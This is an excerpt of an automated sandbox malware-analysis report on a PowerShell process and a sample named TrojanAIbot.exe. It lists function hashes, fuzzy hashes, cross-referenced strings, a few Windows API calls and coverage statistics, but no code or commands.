Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec2a21e81a0972674324dec438a9472d924b8b7d30dc6158ce8563f7437fc6f9
Instruction ID: e786f75d9acf27609d28822980b17135c41590a22b49761af74ac8326d10fe4d
Opcode Fuzzy Hash: ec2a21e81a0972674324dec438a9472d924b8b7d30dc6158ce8563f7437fc6f9
Instruction Fuzzy Hash: 0DF0A0397401048FCB04EB6DAC40AAA7BE6FFCC3517258199E90ACB324DF24EC068F91

Function 047890E8 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 015753e7a9e0b180b808bf67c4f6a6ac082bfc2b82bbb1f3591c872c98eda8c3
Instruction ID: b6ec864db9fedc9f6454381d4f7bdf6b7d59deb98e8885adafa53b4b5a428ded
Opcode Fuzzy Hash: 015753e7a9e0b180b808bf67c4f6a6ac082bfc2b82bbb1f3591c872c98eda8c3
Instruction Fuzzy Hash: F4F0E2396001148BE300AB69D0487AF7796DBC4768F10816EC50A4B3C4CE392806CBE2

Function 0478DED0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23f10f89eb87dad5437527383a9b463049e8c0e04bf6316c2c6d11c55125cd02
Instruction ID: a5429f97dc09a63847aa375f1b3fcb6b724ed96ba8e9decaea67da91729928e9
Opcode Fuzzy Hash: 23f10f89eb87dad5437527383a9b463049e8c0e04bf6316c2c6d11c55125cd02
Instruction Fuzzy Hash: E7E065353501008F8310AF1DD488C66BBEAEFCE62132900AAE54ACB371CB61EC01CB90

Function 0478DD60 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ca1066828deeda02c0e25bbd218f0ed5ebfb6c458a3bfcb85f06a99454b7245
Instruction ID: f85b5fd83d998c376f47eaccf3c66cdec403ca8e17a604324dfd616ee4d05488
Opcode Fuzzy Hash: 1ca1066828deeda02c0e25bbd218f0ed5ebfb6c458a3bfcb85f06a99454b7245
Instruction Fuzzy Hash: 15E02B35B055D09BC728D7ADD4408E8BFB1DFC8224F0484BED4469B751C9716816C791

Function 04789542 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68f73388b8008e788bbb4d51f9e6646bc5c538f30991c89dfcd8bd7bacae7963
Instruction ID: 238e3f57d7a4cfb1db619413f03cb1d5c96e61a6aa3a94686c83ecdeb294f210
Opcode Fuzzy Hash: 68f73388b8008e788bbb4d51f9e6646bc5c538f30991c89dfcd8bd7bacae7963
Instruction Fuzzy Hash: 3EE0DF727CA2A10B871272FD15146BA6F958DC706870A02EEC945DB393D880DC0A83E3

Function 0478896A Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a9387b586d2cad881149f5c188d1813ca2018dedcad800a4fe66c3346a9b5db
Instruction ID: 953aa0d41c63872336b05281fa4a7bcc7eb388e6b4c959579a8a5414e44e2ad9
Opcode Fuzzy Hash: 7a9387b586d2cad881149f5c188d1813ca2018dedcad800a4fe66c3346a9b5db
Instruction Fuzzy Hash: DAF0A0353092908BCB0A6774A41C1AD3FA6DFC6328F0500AEE606CF283CE69090587DA

Function 0478AF88 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b04832a02b86fd0abaa4cba9ba19af18422391def14e5446ef6bf160b710897
Instruction ID: 799ecd1872256d74d92fe185bfc159ee954d6bf03234ccdd1dcac24814cdaefd
Opcode Fuzzy Hash: 7b04832a02b86fd0abaa4cba9ba19af18422391def14e5446ef6bf160b710897
Instruction Fuzzy Hash: 30E0862574D3D10B9B17927D64604AA6FE64EC712431E81FFE484CF713C8558C078351

Function 04789168 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6260477642957c5a5cdd36863735382a6633dc73ecf31d958fbf24505a9b2d5d
Instruction ID: 1e4acf6a0e3e0c0ac2629f635be74ef35ec6e8fef8a6eec37b939dda2878e8b4
Opcode Fuzzy Hash: 6260477642957c5a5cdd36863735382a6633dc73ecf31d958fbf24505a9b2d5d
Instruction Fuzzy Hash: 87F06D709003048BD360DF78E89C39ABBE9EB44310F00446DE20ECB380DB3968818B90

Function 0478F868 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbe8ae293e32bfc73359f50061016b9680841251b3d4acfa4a8a064df4b9efe2
Instruction ID: f7ed1f27605dd80ad8cd00e617a10cc5285e27ac396259e1de716815a7810bc2
Opcode Fuzzy Hash: cbe8ae293e32bfc73359f50061016b9680841251b3d4acfa4a8a064df4b9efe2
Instruction Fuzzy Hash: 82E06D70D042899FC740EFB9C95125DFFF0AB0A600B2485AEC958D7302E7719612DFD1

Function 04788978 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4b4e150335bffa8d7559635aea5da2ee8fd3b4ac46a39829ce5118b406d975a
Instruction ID: 13ef188cdf047625343da7776a431ea853080d7da32849c5b904b21340f93028
Opcode Fuzzy Hash: d4b4e150335bffa8d7559635aea5da2ee8fd3b4ac46a39829ce5118b406d975a
Instruction Fuzzy Hash: 2FE0263530425487CB083775B80C2AE7A9AEBC4729F00002EE60B8F382CF781A4283DA

Function 04789550 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5184c03c7fb0c29f4da1fb4f8ca76d9e1e6a83e88ffa97eedf9a7355b88eb2e
Instruction ID: 4d05151f67073e7fd6707f630861ea161a03051af63b917ad91b6b7b08a14ce5
Opcode Fuzzy Hash: f5184c03c7fb0c29f4da1fb4f8ca76d9e1e6a83e88ffa97eedf9a7355b88eb2e
Instruction Fuzzy Hash: 25D05E727C212117165430FE19046BBA5CECAC54A5746017EDA09D3385EC50FC0A03F2

Function 0478DC98 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7d2996c424f741df7c4b151d1a2c6e8e7b2813c29deb3e24f163d289df1bbc0
Instruction ID: 2e906817f4bbdf8e3428a41c93bff3f4cfa09c16686f6326c3b688f7973213ab
Opcode Fuzzy Hash: c7d2996c424f741df7c4b151d1a2c6e8e7b2813c29deb3e24f163d289df1bbc0
Instruction Fuzzy Hash: C7E08C317806140B8625A65EB81085F769EEFC4661310843EE10D8B380DE64E8058BD5

Function 0478DD70 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction ID: 1b7ef91d439fa94a527adfb0e96c02d8aa84980f7475095d4f2a8da713c8d7dd
Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction Fuzzy Hash: C6E08631B00014978B18A5AAD4504D9F7A5DBCC220F04847ED91AA7380DA3269168691

Function 04788739 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f83d0df791d9cd45ecdd91ac575f3f9c1b3c365677995255d2a29c160855e23e
Instruction ID: 3c19632c3ceca67cedb1dca36b0fe749be8d87ec48c72f02d0a0338e39bb6764
Opcode Fuzzy Hash: f83d0df791d9cd45ecdd91ac575f3f9c1b3c365677995255d2a29c160855e23e
Instruction Fuzzy Hash: 68E0DF30D18048CBCF19BBB4E45D4ED7FB4EE01311B40029DE8938A552EAB0098ACB80

Function 04788800 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbc2e36770879ed406d287c84999daa155e2c87778eb992bd9476d0302883c4b
Instruction ID: 5ee38abe47bd9bc85292fd97283a7653bc8646411f82afd1ea5b505db6626fa3
Opcode Fuzzy Hash: fbc2e36770879ed406d287c84999daa155e2c87778eb992bd9476d0302883c4b
Instruction Fuzzy Hash: 00E0DF34909286CBCB14EBA8E00986DBFB0EF0A204F0041ADE8068F703DA310881DF85

Function 0478F878 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: cf42f2985c77c4de0b14b0e653512d4020344280b399697eca6617aca49a83c9
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: 2BD04C71D042099F8780EFA9894156DFBF4AB48200B5085AA8919D7301E63156129BD1

Function 04788748 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30fa9ce82d73ea575e05d5d43e48961234f75640729e6e53bfec8add3dd11dd2
Instruction ID: 57c4412bb632ba04eb35293ce9aa82b3f97c302ad60e739934740d510210a6a3
Opcode Fuzzy Hash: 30fa9ce82d73ea575e05d5d43e48961234f75640729e6e53bfec8add3dd11dd2
Instruction Fuzzy Hash: 35D06731904109CBCB08BBA5F85E4BDBB78FA14301F40416EE91756291EA712A9ACAC9

Function 04788810 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c78d68ccbc039c79cc57d5cb92d609dfc8e3b8c274f239ffb95f1f02a5d0f9f8
Instruction ID: 739c7c3d5bac41e69d2d2c2305a2c3f45a79bd3f5f63c77bcc8419635e8a9897
Opcode Fuzzy Hash: c78d68ccbc039c79cc57d5cb92d609dfc8e3b8c274f239ffb95f1f02a5d0f9f8
Instruction Fuzzy Hash: 1BD01234E0420ACF8708EF65E44A46DBBB8EB44200F00415DE9069B341EA305D41DFC5

Function 04787932 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46fb93cdd68d9f690242f2136a3fae3f291f8b625a75e03647420a9934dfbb13
Instruction ID: 69de06dd71f63fadb992ed750d943c503cbb06dc9bd60b4da847d5ddf3aca81f
Opcode Fuzzy Hash: 46fb93cdd68d9f690242f2136a3fae3f291f8b625a75e03647420a9934dfbb13
Instruction Fuzzy Hash: 5FD09E3404D3C46FC756AB7894648553F605D4312471504DFD486DF163C5668449CB26

Function 04787EA0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0e3017f0615068372f39d5ada2720df9b1d30a1bd9b56bf04590451d1a49584
Instruction ID: 0476f2be46bb6b3bd26c1c9d4649d47f48089a6f1ee0139517f6fe8af6264e10
Opcode Fuzzy Hash: d0e3017f0615068372f39d5ada2720df9b1d30a1bd9b56bf04590451d1a49584
Instruction Fuzzy Hash: 29C08C0440F3C00EDF43A3384AE92027FB2098342830A02CBC080CE423C868880AC763

Function 04787940 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b944a4684f8f8a696abc894813ff9e21257c44d4082111626c39184db30b994
Instruction ID: 9aaa5fa13218b57b53ddcf79bb199f5528e1e45f8891ae3c0a9f027796c0f2de
Opcode Fuzzy Hash: 2b944a4684f8f8a696abc894813ff9e21257c44d4082111626c39184db30b994
Instruction Fuzzy Hash: 38B092340447088FC358AF79E4048147329FB4521978104ECE90E0A292CE76E889CA46

Non-executed Functions

Function 076D0F94 Relevance: 11.4, Strings: 9, Instructions: 200COMMON

Download Yara Rule

Strings

$]q, xrefs: 076D1081
$]q, xrefs: 076D1044
`Q]q, xrefs: 076D1153
$]q, xrefs: 076D1229
`Q]q, xrefs: 076D10ED
tP]q, xrefs: 076D1127
$]q, xrefs: 076D1065
$]q, xrefs: 076D1253
fbq, xrefs: 076D10A2

Memory Dump Source

Source File: 0000000D.00000002.2281375618.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_76d0000_powershell.jbxd

Similarity

API ID:
String ID: fbq$`Q]q$`Q]q$tP]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-810355167
Opcode ID: 89210ccc4de1e6b0b5cbf58c9b16369dc58e42f49593e1fc8fa7fb024d91bebd
Instruction ID: 3e7916812526296dc49130d2320b5ed3ab0f91e944c9e0379bb9d160f3d6a4ec
Opcode Fuzzy Hash: 89210ccc4de1e6b0b5cbf58c9b16369dc58e42f49593e1fc8fa7fb024d91bebd
Instruction Fuzzy Hash: 4671A2B0E2420EDFDB2D8E68C944BAA77F1BB47341F168055E8029B390C7B5DD85CBA1

Function 076D3928 Relevance: 10.3, Strings: 8, Instructions: 325COMMON

Download Yara Rule

Strings

tP]q, xrefs: 076D39A5
$]q, xrefs: 076D3960
4']q, xrefs: 076D3B35
$]q, xrefs: 076D396C
$]q, xrefs: 076D393A
$]q, xrefs: 076D3C0E
tP]q, xrefs: 076D39B1
4']q, xrefs: 076D3B29

Memory Dump Source

Source File: 0000000D.00000002.2281375618.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_76d0000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
API String ID: 0-1910532044
Opcode ID: 172fd7979748a6d36b61438385b71f1d620cba028a57ca6c9489115c3c32fd29
Instruction ID: b8619b100dc6952914ea9301577ddfd851f07a4622068544255a0387e387a6d3
Opcode Fuzzy Hash: 172fd7979748a6d36b61438385b71f1d620cba028a57ca6c9489115c3c32fd29
Instruction Fuzzy Hash: F9A189B1B28305DFCB249A7A9850766BBF6AFC6710F18846AD446CF352DE35CC41C762

Function 076D1BE0 Relevance: 9.2, Strings: 7, Instructions: 402COMMON

Download Yara Rule

Strings

4']q, xrefs: 076D1C86
4']q, xrefs: 076D1F89
4']q, xrefs: 076D1C92
pioj, xrefs: 076D1C73
tP]q, xrefs: 076D1FDF
tP]q, xrefs: 076D1FEB
4']q, xrefs: 076D1F95

Memory Dump Source

Source File: 0000000D.00000002.2281375618.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_76d0000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$pioj$tP]q$tP]q
API String ID: 0-1776749687
Opcode ID: 084395398640417939dd89edcb4959c91e9840e94af659163beadb3ed7fea8a7
Instruction ID: d8ea3e82820983a27481bb41e77914dfc2269dd8b14f6eaa99bff23872e2a646
Opcode Fuzzy Hash: 084395398640417939dd89edcb4959c91e9840e94af659163beadb3ed7fea8a7
Instruction Fuzzy Hash: EDD15AB1F142098FC7299B7894106AABBF6AFC6310F1984ABC546CB351CB75CC86C7A1

Function 076D0568 Relevance: 6.7, Strings: 5, Instructions: 420COMMON

Download Yara Rule

Strings

4']q, xrefs: 076D096E
4']q, xrefs: 076D05F6
4']q, xrefs: 076D05EC
4']q, xrefs: 076D0962
fbq, xrefs: 076D094B

Memory Dump Source

Source File: 0000000D.00000002.2281375618.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_76d0000_powershell.jbxd

Similarity

API ID:
String ID: fbq$4']q$4']q$4']q$4']q
API String ID: 0-2283484764
Opcode ID: b999cef4dee67e1e9fff7f7a8627ada665f33377745537dacce3e3861b4a0e57
Instruction ID: 495969278222d45231b4b1b30ee0b38e1c78acc54588e01f172fb39d15c0c62d
Opcode Fuzzy Hash: b999cef4dee67e1e9fff7f7a8627ada665f33377745537dacce3e3861b4a0e57
Instruction Fuzzy Hash: 60D14771B182558FCB159B7898106AA7FA6EFC6310F14C0BBD546CF352DA358C86C7E2

Function 076D3678 Relevance: 6.4, Strings: 5, Instructions: 186COMMON

Download Yara Rule

Strings

$]q, xrefs: 076D382A
4']q, xrefs: 076D372E
$]q, xrefs: 076D3836
$]q, xrefs: 076D37FF
4']q, xrefs: 076D3722

Memory Dump Source

Source File: 0000000D.00000002.2281375618.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_76d0000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q$$]q
API String ID: 0-2353078639
Opcode ID: 695ff6abcb84436d0b659b45f70926ee736795fabeabcf195324ae6d6c02d89c
Instruction ID: 8ae0344c19c8f07c0298342afcc3cf6399b599881f83207deac5e570af16d5b8
Opcode Fuzzy Hash: 695ff6abcb84436d0b659b45f70926ee736795fabeabcf195324ae6d6c02d89c
Instruction Fuzzy Hash: FE5144B5B24346DFCB249A7A8810766BBB6AFC2611F24847BD447CB341CA35CC46C7A3

Function 04787A21 Relevance: 5.2, Strings: 4, Instructions: 241COMMON

Download Yara Rule

Strings

`^q, xrefs: 04787CC2
`^q, xrefs: 04787BA2
`^q, xrefs: 04787B23
`^q, xrefs: 04787C44

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID: `^q$`^q$`^q$`^q
API String ID: 0-4294711580
Opcode ID: fd0bc27df89c82f514d196ff7124cc57312fa9a686bf2f3b338e87d58eade7c0
Instruction ID: d24c315cb71f0bfa41c8622f8dcc3551c62915c85816b35feffc64c8fbc73434
Opcode Fuzzy Hash: fd0bc27df89c82f514d196ff7124cc57312fa9a686bf2f3b338e87d58eade7c0
Instruction Fuzzy Hash: 30B1E774E012099FDB54DFA9D990A9DFBF6FF88300F20862AD419AB355DB34A905CF90

Function 04787A30 Relevance: 5.2, Strings: 4, Instructions: 234COMMON

Download Yara Rule

Strings

`^q, xrefs: 04787CC2
`^q, xrefs: 04787BA2
`^q, xrefs: 04787B23
`^q, xrefs: 04787C44

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID: `^q$`^q$`^q$`^q
API String ID: 0-4294711580
Opcode ID: c348ca7e0d035f45777ea89e2c3bcc778627f0f06fdea650b98dbbfd4dc6fd93
Instruction ID: 1d855d1685eb78e3b1d8bb8155177b02802b91ae687708d5af289cd9ea238934
Opcode Fuzzy Hash: c348ca7e0d035f45777ea89e2c3bcc778627f0f06fdea650b98dbbfd4dc6fd93
Instruction Fuzzy Hash: 46B1C674E012099FDB58DFA9D980A9DFBF6FF88300F208629D419AB354DB34A945CF90

Function 076D5798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$]q, xrefs: 076D5800
$]q, xrefs: 076D57C6
$]q, xrefs: 076D57F4
$]q, xrefs: 076D57AA

Memory Dump Source

Source File: 0000000D.00000002.2281375618.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_76d0000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: aa469334572c9f3652076a95d51762092b1463c530a6d9bfbf9323673cb92ad0
Instruction ID: c17a4cb95e592d405cb363bc296f885ccf04dedad1c405a16002f74fe4e4ecae
Opcode Fuzzy Hash: aa469334572c9f3652076a95d51762092b1463c530a6d9bfbf9323673cb92ad0
Instruction Fuzzy Hash: 7A2126B1B243269BDB28553E9840B26A7D7ABD0711F24843AE907CBB82DD36CC518361

Function 076D0309 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

$]q, xrefs: 076D035E
$]q, xrefs: 076D0352
4']q, xrefs: 076D0373
4']q, xrefs: 076D037F

Memory Dump Source

Source File: 0000000D.00000002.2281375618.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_76d0000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: 7b94d625fc2f1c5ea808405d0620b8eca01adca73f6d48c8953927b120eb67d3
Instruction ID: 61d2ae9db5a3d62dbea23d62341a094e09f2b334b66543abdb016b69adb5e50f
Opcode Fuzzy Hash: 7b94d625fc2f1c5ea808405d0620b8eca01adca73f6d48c8953927b120eb67d3
Instruction Fuzzy Hash: 05018F61B1D3964FC72B123C58701A56FB26F83910B5A46E7C482CF297C9594C0A83A7

Analysis Process: TrojanAIbot.exePID: 616, Parent PID: 2820COMMON

Execution Graph

Execution Coverage:	12.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	490
Total number of Limit Nodes:	45

Executed Functions

Function 05B216C0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 160
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(00000037,00000000,00000000,03774164,0281CE70,?,00000000,?,00000000,00000000), ref: 05B21877

Strings

Haq, xrefs: 05B21760

Memory Dump Source

Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID: Haq
API String ID: 2492992576-725504367
Opcode ID: 54185b1960d8a57fe402ebac0ccab36e0fb94ade9483e1b28299af751a10c87f
Instruction ID: d4200c12a071ca08fa20dc1520d7cb18845d79d6fb3e0ac81624ea0008643658
Opcode Fuzzy Hash: 54185b1960d8a57fe402ebac0ccab36e0fb94ade9483e1b28299af751a10c87f
Instruction Fuzzy Hash: 84517C34704A119FC719AB28C854B6A77E7FFC5700B1584A9E40ACB7A1CF74ED42CBA5

Function 025BD2F7 Relevance: 1.7, APIs: 1, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 025BD55E

Memory Dump Source

Source File: 00000012.00000002.4519580354.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_25b0000_TrojanAIbot.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a5fa6142f2d93ef8c3dbcce7710bb07c086f0b36eb3b95ed174753daef8eafbb
Instruction ID: f22b81aa0fd7a7e9fedb9d80241d568316c85e98aecf48021fb8e0420827884a
Opcode Fuzzy Hash: a5fa6142f2d93ef8c3dbcce7710bb07c086f0b36eb3b95ed174753daef8eafbb
Instruction Fuzzy Hash: FD8144B0A00B058FD725DF29D0507AABBF2FF88304F14892ED48AD7A40D775E94ACB95

Function 05B23E64 Relevance: 1.6, APIs: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05B23F82

Memory Dump Source

Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 2e93a1538ec0a2498b53e21d135b3d94285e414a7a8337cec91a04d09adb09a5
Instruction ID: 09bd4b95d5d7143159e9f60d875f5badbc98de37117290fc1c9d917c8669b9ee
Opcode Fuzzy Hash: 2e93a1538ec0a2498b53e21d135b3d94285e414a7a8337cec91a04d09adb09a5
Instruction Fuzzy Hash: DA51DFB1C043199FDB14CF9AD884ADEBBF5FF48310F24852AE819AB250D775A885CF90

Function 05B21B40 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05B23F82

Memory Dump Source

Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
